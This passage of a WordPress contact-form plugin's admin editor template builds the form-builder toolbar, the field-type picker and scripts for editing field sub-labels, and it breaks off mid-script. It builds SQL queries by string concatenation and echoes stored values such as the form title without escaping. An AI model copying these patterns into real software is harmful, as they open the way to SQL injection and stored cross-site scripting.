					UPGRADE TO PRO VERSION 
					<span></span>
				</div>
			</a>
		</div>
		<div class="fm-clear"></div>
		<form class="wrap" id="manage_form" method="post" action="admin.php?page=manage_fmc" style="width:99%;">
		<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
			<h2 class="fm-h2-message"></h2>
			<div class="fm-page-header">
				<!-- <div class="fm-page-title">
					<?php echo $page_title; ?>
				</div> -->
				<div style="float:left;">
					<div class="fm-logo-edit-page"></div>
					<div class="fm-title-edit-page">Contact Form</br>Maker</div>
				</div>
				<div class="fm-page-actions">
					<button class="fm-button form-options-button medium" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; fm_set_input_value('task', 'form_options');">
						<span></span>
						Form Options
					</button>	
					<button class="fm-button form-layout-button medium" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; fm_set_input_value('task', 'form_layout');">
						<span></span>
						Form Layout
					</button>	
					<div style="height:40px; border-right: 1px solid #848484; display: inline-block; width: 5px; vertical-align: bottom; margin-right: 5px;"></div>		
					<?php
					if(isset($row->backup_id) )
						if($row->backup_id!="") {
							global $wpdb;
							$query = "SELECT backup_id FROM " . $wpdb->prefix . "formmaker_backup WHERE backup_id > ".$row->backup_id." AND id = ".$row->id." ORDER BY backup_id ASC LIMIT 0 , 1 ";
							$backup_id = $wpdb->get_var($query);
							if($backup_id) { ?>
								<button class="fm-button redo-button small" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; jQuery('#saving_text').html('Redo');fm_set_input_value('task', 'redo');">
									<span></span>
									Redo
								</button>
								<?php 
							}
							$query = "SELECT backup_id FROM " . $wpdb->prefix . "formmaker_backup WHERE backup_id < ".$row->backup_id." AND id = ".$row->id." ORDER BY backup_id DESC LIMIT 0 , 1 ";
							$backup_id = $wpdb->get_var($query);

							if($backup_id) { ?>
								<button class="fm-button undo-button small" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; jQuery('#saving_text').html('Undo');fm_set_input_value('task', 'undo');">
									<span></span>
									Undo
								</button>
								<?php
							}
						}
						?>
					
					<?php if ($id) { ?>
						<button class="fm-button save-as-copy-button medium" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; fm_set_input_value('task', 'save_as_copy');">
							<span></span>
							Save as Copy
						</button>
					<?php } ?>
					<button class="fm-button save-button small" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; fm_set_input_value('task', 'save');">
						<span></span>
						Save
					</button>
					<button class="fm-button apply-button small" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; fm_set_input_value('task', 'apply');">
						<span></span>
						Apply
					</button>
					<button class="fm-button cancel-button small" onclick="fm_set_input_value('task', 'cancel');">
						<span></span>
						Cancel
					</button>
				</div>
				<div class="fm-clear"></div>
			</div>
			<div class="fm-title">
				<span style="">Form title:&nbsp;</span>
				<input id="title" name="title" value="<?php echo $row->title; ?>"/>
			</div>
			<div class="fm-clear"></div>
			<br/>
			<div class="fm-theme-banner">
				<div class="fm-theme" style="float:left;">
					
					<span style="">Theme:&nbsp;</span>
					<select id="theme" name="theme" onChange="set_preview()">
						<?php
						foreach ($themes as $theme) {
							?>
							<option value="<?php echo $theme->id; ?>" <?php echo (($theme->id == $row->theme) ? 'selected' : ''); ?>><?php echo $theme->title; ?></option>
							<?php
						}
						?>
					</select>
					<button id="preview_form" class="fm-button preview-button small" onclick="tb_show('', '<?php echo add_query_arg(array('action' => 'FormMakerPreview_fmc', 'form_id' => $row->id, 'test_theme' => $row->theme, 'width' => '1000', 'height' => '500', 'TB_iframe' => '1'), admin_url('admin-ajax.php')); ?>'); return false;">
						<span></span>
						Preview
					</button>
					<button id="edit_css" class="fm-button options-edit-button small" onclick="tb_show('', '<?php echo add_query_arg(array('action' => 'FormMakerEditCSS_fmc', 'id' => $row->theme, 'form_id' => $row->id, 'width' => '1000', 'height' => '500', 'TB_iframe' => '1'), admin_url('admin-ajax.php')); ?>'); return false;">
						<span></span>
						Edit CSS
					</button>
				</div>
				<div style="float:right;">
					<button class="fm-button add-new-button large" onclick="enable(); Enable(); return false;">
						Add a New Field
						<span></span>
					</button>
				</div>	
			</div>
			<div class="fm-clear"></div>
			<div id="formMakerDiv" onclick="close_window()"></div>
				<div id="formMakerDiv1">
					<table class="formMakerDiv1_table" border="0" width="100%" cellpadding="0" cellspacing="0" height="100%">
						<tr>
							<td style="padding:0px">
								<table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%" >
									<tr valign="top">
										<td width="20%" height="100%" id="field_types">
											<div id="when_edit" style="display: none;"></div>
											<table border="0" cellpadding="0" cellspacing="3" width="100%" style="border-collapse: separate; border-spacing: 3px;">
												<tbody>
													<tr>
														<td align="center" onclick="addRow('customHTML')" class="field_buttons" id="table_editor">
															<img src="<?php echo WD_FMC_URL; ?>/images/customHTML.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_customHTML">
															<div>Custom HTML</div>
														</td>
														<td align="center" onclick="addRow('text')" class="field_buttons" id="table_text">
															<img src="<?php echo WD_FMC_URL; ?>/images/text.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_text">
															<div>Text input</div>
														</td>
													</tr>
													<tr>
														<td align="center" onclick="alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.')" class="field_buttons field_disabled" id="table_checkbox">
															<img src="<?php echo WD_FMC_URL; ?>/images/checkbox.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_checkbox">
															<div>Multiple Choice</div>
														</td>
														<td align="center" onclick="alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.')" class="field_buttons field_disabled" id="table_radio">
															<img src="<?php echo WD_FMC_URL; ?>/images/radio.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_radio">
															<div>Single Choice</div>
														</td>
													</tr>
													<tr>
														<td align="center" onclick="alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.')" class="field_buttons field_disabled" id="table_survey">
															<img src="<?php echo WD_FMC_URL; ?>/images/survey.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_survey">
															<div>Survey Tools</div>
														</td>           
														<td align="center" onclick="alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.')" class="field_buttons field_disabled" id="table_time_and_date">
															<img src="<?php echo WD_FMC_URL; ?>/images/time_and_date.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_time_and_date">
															<div>Time and Date</div>
														</td>
												   </tr>
													<tr>
														<td align="center" onclick="alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.')" class="field_buttons field_disabled" id="table_select">
															<img src="<?php echo WD_FMC_URL; ?>/images/select.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_select">
															<div>Select Box</div>
														</td>
														<td align="center" onclick="alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.')" class="field_buttons field_disabled" id="table_file_upload">
															<img src="<?php echo WD_FMC_URL; ?>/images/file_upload.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_file_upload">
															<div>File Upload</div>
														</td>
													</tr>
													<tr>
														<td align="center" onclick="addRow('section_break')" class="field_buttons" id="table_section_break">
															<img src="<?php echo WD_FMC_URL; ?>/images/section_break.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_section_break">
															<div>Section Break</div>
														</td>
														<td align="center" onclick="addRow('page_break')" class="field_buttons" id="table_page_break">
															<img src="<?php echo WD_FMC_URL; ?>/images/page_break.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_page_break">
															<div>Page Break</div>
														</td>  
													</tr>
													<tr>
														<td align="center" onclick="addRow('map')" class="field_buttons" id="table_map">
															<img src="<?php echo WD_FMC_URL; ?>/images/map.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_map">
															<div>Map</div>
														</td>  
														<td align="center" onclick="alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.')" id="table_paypal" class="field_buttons field_disabled">
															<img src="<?php echo WD_FMC_URL; ?>/images/paypal.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_paypal">
															<div>PayPal</div>
													</td>       
												   </tr>
													<tr>
														<td align="center" onclick="addRow('captcha')" class="field_buttons" id="table_captcha">
															<img src="<?php echo WD_FMC_URL; ?>/images/captcha.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_captcha">
															<div>Captcha</div>
														</td>
														<td align="center" onclick="addRow('button')" id="table_button" class="field_buttons">
															<img src="<?php echo WD_FMC_URL; ?>/images/button.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" style="margin:5px" id="img_button">
															<div>Button</div>
														</td>			
													</tr>
												</tbody>
											</table>
										</td>
										<td width="40%" height="100%" align="left">
											<div id="edit_table"></div>
										</td>
										<td align="center" valign="top" style="background: url("<?php echo WD_FMC_URL . '/images/border2.png'; ?>") repeat-y;">&nbsp;</td>
										<td style="padding:15px;">
											<table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%" >
												<tr>
													<td align="right">
														<input type="radio" value="end" name="el_pos" checked="checked" id="pos_end" onclick="Disable()"/>
														At The End
														<input type="radio" value="begin" name="el_pos" id="pos_begin" onclick="Disable()"/>
														At The Beginning
														<input type="radio" value="before" name="el_pos" id="pos_before" onclick="Enable()"/>
														Before
														<select style="width: 100px; margin-left: 5px;" id="sel_el_pos" onclick="change_before()" disabled="disabled"></select>
														<br>
														<button class="fm-button field-save-button small" onclick="add(0, false); return false;">
															Save
															<span></span>
														</button>
														<button class="fm-button cancel-button small" onclick="close_window(); return false;">
															Cancel
															<span></span>
														</button>
														<hr style="margin-bottom:10px" />
													</td>
												</tr>
												<tr height="100%" valign="top">
													<td id="show_table"></td>
												</tr>
											</table>
										</td>
									</tr>
								</table>
							</td>
						</tr>
					</table>
					<input type="hidden" id="old" />
					<input type="hidden" id="old_selected" />
					<input type="hidden" id="element_type" />
					<input type="hidden" id="editing_id" />
					<input type="hidden" value="<?php echo WD_FMC_URL; ?>" id="form_plugins_url" />
					<div id="main_editor" style="position: fixed; display: none; z-index: 140;">
						<?php if (user_can_richedit()) {
							wp_editor('', 'form_maker_editor', array('teeny' => FALSE, 'textarea_name' => 'form_maker_editor', 'media_buttons' => FALSE, 'textarea_rows' => 5));
						}
						else { ?>
							<textarea name="form_maker_editor" id="form_maker_editor" cols="40" rows="5" style="width: 440px; height: 350px;" class="mce_editable" aria-hidden="true"></textarea>
							<?php
						}
						?>
					</div>
				</div>
					<?php if (!function_exists('the_editor')) { ?>
						<iframe id="tinymce" style="display: none;"></iframe>
					<?php } ?>
				
				<div class="fm-edit-content">		
					<div class="fm-drag-and-drop">
						<div>
							<label for="enable_sortable">Enable Drag & Drop</label>
							<button name="sortable" id="enable_sortable" class="fm-checkbox-radio-button <?php echo $row->sortable == 1 ? 'fm-yes' : 'fm-no' ?>" onclick="enable_drag(this); return false;" value="<?php echo $row->sortable; ?>">
								<span></span>
							</button>	
							<input type="hidden" name="sortable" id="sortable_hidden" value="<?php echo $row->sortable; ?>"/>					
						</div>
						<div>
							You can use drag and drop to move the fields up/down for the change of the order and left/right for creating columns within the form.
						</div>
					</div>
					<fieldset>
						<legend></legend>
						<?php if ($id) { ?>
							<div style="margin: 8px; display: table; width: 100%;" id="page_bar">
								<div id="page_navigation" style="display: table-row;">
									<div align="center" id="pages" show_title="<?php echo $row->show_title; ?>" show_numbers="<?php echo $row->show_numbers; ?>" type="<?php echo $row->pagination; ?>" style="display: table-cell;  width:90%;"></div>
									<div align="left" id="edit_page_navigation" style="display: table-cell; vertical-align: middle;"></div>
								</div>
							</div>
							<div id="take" class="main">
								<?php echo $row->form_front; ?>
							</div>
						<?php } else { ?>
							<div style="margin:8px; display:table; width:100%"  id="page_bar">
								<div id="page_navigation" style="display:table-row">
									<div align="center" id="pages" show_title="false" show_numbers="true" type="none" style="display:table-cell;  width:90%"></div>
									<div align="left" id="edit_page_navigation" style="display:table-cell; vertical-align: middle;"></div>
								</div>
							</div>
							<div id="take" class="main">
								<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;">
									<div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false">
										<div class="wdform_section">
											<div class="wdform_column"></div>
										</div>
										<div valign="top" class="wdform_footer" style="width: 100%;">
											<div style="width: 100%;">
												<div style="width: 100%; display: table; padding-top:10px;">
													<div style="display: table-row-group;">
														<div id="form_id_temppage_nav1" style="display: table-row;"></div>
													</div>
												</div>
											</div>
										</div>
									</div>
									<div id="form_id_tempform_view_img1" style="float: right;">
										<div>
											<img src="<?php echo WD_FMC_URL . '/images/minus.png?ver='. get_option("wd_form_maker_version"); ?>" title="Show or hide the page" class="page_toolbar" onClick="show_or_hide('1')" onMouseOver="chnage_icons_src(this,'minus')" onmouseout="chnage_icons_src(this,'minus')" id="show_page_img_1"/>
											<img src="<?php echo WD_FMC_URL . '/images/page_delete.png?ver='. get_option("wd_form_maker_version"); ?>" title="Delete the page" class="page_toolbar" onClick="remove_page('1')" onMouseOver="chnage_icons_src(this,'page_delete')" onmouseout="chnage_icons_src(this,'page_delete')"/>
											<img src="<?php echo WD_FMC_URL . '/images/page_delete_all.png?ver='. get_option("wd_form_maker_version"); ?>" title="Delete the page with fields" class="page_toolbar" onClick="remove_page_all('1')" onMouseOver="chnage_icons_src(this,'page_delete_all')" onmouseout="chnage_icons_src(this,'page_delete_all')"/>
											<img src="<?php echo WD_FMC_URL . '/images/page_edit.png?ver='. get_option("wd_form_maker_version"); ?>" title="Edit the page" class="page_toolbar" onClick="edit_page_break('1')" onMouseOver="chnage_icons_src(this,'page_edit')"  onmouseout="chnage_icons_src(this,'page_edit')"/>
										</div>
									</div>
								</div>
							</div>
						<?php } ?>
					</fieldset>
				</div>
				<input type="hidden" name="form_front" id="form_front" />
				<input type="hidden" name="form_fields" id="form_fields" />
				<input type="hidden" name="pagination" id="pagination" />
				<input type="hidden" name="show_title" id="show_title" />
				<input type="hidden" name="show_numbers" id="show_numbers" />
				<input type="hidden" name="public_key" id="public_key" />
				<input type="hidden" name="private_key" id="private_key" />
				<input type="hidden" name="recaptcha_theme" id="recaptcha_theme" />
				<input type="hidden" id="label_order" name="label_order" value="<?php echo $row->label_order; ?>" />
				<input type="hidden" id="label_order_current" name="label_order_current" value="<?php echo $row->label_order_current; ?>" />  
				<input type="hidden" name="counter" id="counter" value="<?php echo $row->counter; ?>" />
				<input type="hidden" id="araqel" value="0" />
				<input type="hidden" name="backup_id" id="backup_id" value="<?php echo $row->backup_id;?>">
				
				<?php if ($id) { ?>
				<script type="text/javascript">
					function set_preview() {
						jQuery("#preview_form").attr("onclick", "tb_show('', '<?php echo add_query_arg(array('action' => 'FormMakerPreview_fmc', 'form_id' => $row->id), admin_url('admin-ajax.php')); ?>&test_theme=" + jQuery('#theme').val() + "&width=1000&height=500&TB_iframe=1'); return false;");
						jQuery("#edit_css").attr("onclick", "tb_show('', '<?php echo add_query_arg(array('action' => 'FormMakerEditCSS_fmc', 'form_id' => $row->id), admin_url('admin-ajax.php')); ?>&id=" + jQuery('#theme').val() + "&width=800&height=500&TB_iframe=1'); return false;");
					}
					function formOnload() {
						for (t = 0; t < <?php echo $row->counter; ?>; t++) {
							if (document.getElementById(t + "_typeform_id_temp")) {
								if (document.getElementById(t + "_typeform_id_temp").value == "type_map" || document.getElementById(t + "_typeform_id_temp").value == "type_mark_map") {
									if_gmap_init(t);
									for (q = 0; q < 20; q++) {
										if (document.getElementById(t + "_elementform_id_temp").getAttribute("long" + q)) {
											w_long = parseFloat(document.getElementById(t + "_elementform_id_temp").getAttribute("long" + q));
											w_lat = parseFloat(document.getElementById(t + "_elementform_id_temp").getAttribute("lat" + q));
											w_info = parseFloat(document.getElementById(t + "_elementform_id_temp").getAttribute("info" + q));
											add_marker_on_map(t, q, w_long, w_lat, w_info, false);
										}
									}
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_date") {
									// Calendar.setup({
									  // inputField:t + "_elementform_id_temp",
									  // ifFormat:document.getElementById(t + "_buttonform_id_temp").getAttribute('format'),
									  // button:t + "_buttonform_id_temp",
									  // align:"Tl",
									  // singleClick:true,
									  // firstDay:0
									// });
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_name") {
									var myu = t;
									jQuery(document).ready(function () {
										jQuery("#" + myu + "_mini_label_first").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var first = "<input type='text' id='first' class='first' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(first);
												jQuery("input.first").focus();
												jQuery("input.first").blur(function () {
													var id_for_blur = document.getElementById('first').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_first").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_last").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var last = "<input type='text' id='last' class='last'  style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(last);
												jQuery("input.last").focus();
												jQuery("input.last").blur(function () {
													var id_for_blur = document.getElementById('last').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_last").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_title").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var title_ = "<input type='text' id='title_' class='title_'  style='outline:none; border:none; background:none; width:50px;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(title_);
												jQuery("input.title_").focus();
												jQuery("input.title_").blur(function () {
													var id_for_blur = document.getElementById('title_').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_title").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_middle").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var middle = "<input type='text' id='middle' class='middle'  style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(middle);
												jQuery("input.middle").focus();
												jQuery("input.middle").blur(function () {
													var id_for_blur = document.getElementById('middle').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_middle").text(value);
												});
											}
										});
									});
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_phone") {
									var myu = t;
									jQuery(document).ready(function () {
										jQuery("label#" + myu + "_mini_label_area_code").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var area_code = "<input type='text' id='area_code' class='area_code' size='10' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(area_code);
												jQuery("input.area_code").focus();
												jQuery("input.area_code").blur(function () {
													var id_for_blur = document.getElementById('area_code').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_area_code").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_phone_number").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var phone_number = "<input type='text' id='phone_number' class='phone_number'  style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(phone_number);
												jQuery("input.phone_number").focus();
												jQuery("input.phone_number").blur(function () {
													var id_for_blur = document.getElementById('phone_number').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_phone_number").text(value);
												});
											}
										});
									});
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_date_fields") {
									var myu = t;
									jQuery(document).ready(function () {
										jQuery("label#" + myu + "_day_label").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var day = "<input type='text' id='day' class='day' size='8' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(day);
												jQuery("input.day").focus();
												jQuery("input.day").blur(function () {
													var id_for_blur = document.getElementById('day').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_day_label").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_month_label").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var month = "<input type='text' id='month' class='month' size='8' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(month);
												jQuery("input.month").focus();
												jQuery("input.month").blur(function () {
													var id_for_blur = document.getElementById('month').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_month_label").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_year_label").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var year = "<input type='text' id='year' class='year' size='8' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(year);
												jQuery("input.year").focus();
												jQuery("input.year").blur(function () {
													var id_for_blur = document.getElementById('year').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_year_label").text(value);
												});
											}
										});
									});
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_time") {
									var myu = t;
									jQuery(document).ready(function () {
										jQuery("label#" + myu + "_mini_label_hh").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var hh = "<input type='text' id='hh' class='hh' size='4' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(hh);
												jQuery("input.hh").focus();
												jQuery("input.hh").blur(function () {
													var id_for_blur = document.getElementById('hh').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_hh").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_mm").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var mm = "<input type='text' id='mm' class='mm' size='4' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(mm);
												jQuery("input.mm").focus();
												jQuery("input.mm").blur(function () {
													var id_for_blur = document.getElementById('mm').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_mm").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_ss").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var ss = "<input type='text' id='ss' class='ss' size='4' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(ss);
												jQuery("input.ss").focus();
												jQuery("input.ss").blur(function () {
													var id_for_blur = document.getElementById('ss').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_ss").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_am_pm").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var am_pm = "<input type='text' id='am_pm' class='am_pm' size='4' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(am_pm);
												jQuery("input.am_pm").focus();
												jQuery("input.am_pm").blur(function () {
													var id_for_blur = document.getElementById('am_pm').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_am_pm").text(value);
												});
											}
										});
									});
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_paypal_price") {
									var myu = t;
									jQuery(document).ready(function () {
										jQuery("#" + myu + "_mini_label_dollars").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var dollars = "<input type='text' id='dollars' class='dollars' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(dollars);
												jQuery("input.dollars").focus();
												jQuery("input.dollars").blur(function () {
													var id_for_blur = document.getElementById('dollars').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_dollars").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_cents").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var cents = "<input type='text' id='cents' class='cents'  style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(cents);
												jQuery("input.cents").focus();
												jQuery("input.cents").blur(function () {
													var id_for_blur = document.getElementById('cents').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_cents").text(value);
												});
											}
										});
									});
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_address") {
									var myu = t;
									jQuery(document).ready(function () {
										jQuery("label#" + myu + "_mini_label_street1").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var street1 = "<input type='text' id='street1' class='street1' style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(street1);
												jQuery("input.street1").focus();
												jQuery("input.street1").blur(function () {
													var id_for_blur = document.getElementById('street1').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_street1").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_street2").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var street2 = "<input type='text' id='street2' class='street2'  style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(street2);
												jQuery("input.street2").focus();
												jQuery("input.street2").blur(function () {
													var id_for_blur = document.getElementById('street2').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_street2").text(value);
											  });
											}
										});
										jQuery("label#" + myu + "_mini_label_city").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var city = "<input type='text' id='city' class='city'  style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(city);
												jQuery("input.city").focus();
												jQuery("input.city").blur(function () {
													var id_for_blur = document.getElementById('city').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_city").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_state").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var state = "<input type='text' id='state' class='state'  style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(state);
												jQuery("input.state").focus();
												jQuery("input.state").blur(function () {
													var id_for_blur = document.getElementById('state').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_state").text(value);
											  });
											}
										});
										jQuery("label#" + myu + "_mini_label_postal").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var postal = "<input type='text' id='postal' class='postal'  style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(postal);
												jQuery("input.postal").focus();
												jQuery("input.postal").blur(function () {
													var id_for_blur = document.getElementById('postal').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_postal").text(value);
												});
											}
										});
										jQuery("label#" + myu + "_mini_label_country").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var country = "<input type='country' id='country' class='country'  style='outline:none; border:none; background:none;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(country);
												jQuery("input.country").focus();
												jQuery("input.country").blur(function () {
													var id_for_blur = document.getElementById('country').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_country").text(value);
												});
											}
										});
									});
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_scale_rating") {
									var myu = t;
									jQuery(document).ready(function () {
										jQuery("#" + myu + "_mini_label_worst").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var worst = "<input type='text' id='worst' class='worst' size='6' style='outline:none; border:none; background:none; font-size:11px;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(worst);
												jQuery("input.worst").focus();
												jQuery("input.worst").blur(function () {
													var id_for_blur = document.getElementById('worst').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_worst").text(value);
											  });
											}
										});
										jQuery("label#" + myu + "_mini_label_best").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var best = "<input type='text' id='best' class='best' size='6' style='outline:none; border:none; background:none; font-size:11px;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(best);
												jQuery("input.best").focus();
												jQuery("input.best").blur(function () {
													var id_for_blur = document.getElementById('best').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_best").text(value);
												});
											}
										});
									});
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_spinner") {
									var spinner_value = document.getElementById(t + "_elementform_id_temp").value;
									var spinner_min_value = document.getElementById(t + "_min_valueform_id_temp").value;
									var spinner_max_value = document.getElementById(t + "_max_valueform_id_temp").value;
									var spinner_step = document.getElementById(t + "_stepform_id_temp").value;
									jQuery("#" + t + "_elementform_id_temp")[0].spin = null;
									spinner = jQuery("#" + t + "_elementform_id_temp").spinner();
									spinner.spinner("value", spinner_value);
									jQuery("#" + t + "_elementform_id_temp").spinner({ min:spinner_min_value});
									jQuery("#" + t + "_elementform_id_temp").spinner({ max:spinner_max_value});
									jQuery("#" + t + "_elementform_id_temp").spinner({ step:spinner_step});
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_slider") {
									var slider_value = document.getElementById(t + "_slider_valueform_id_temp").value;
									var slider_min_value = document.getElementById(t + "_slider_min_valueform_id_temp").value;
									var slider_max_value = document.getElementById(t + "_slider_max_valueform_id_temp").value;
									var slider_element_value = document.getElementById(t + "_element_valueform_id_temp");
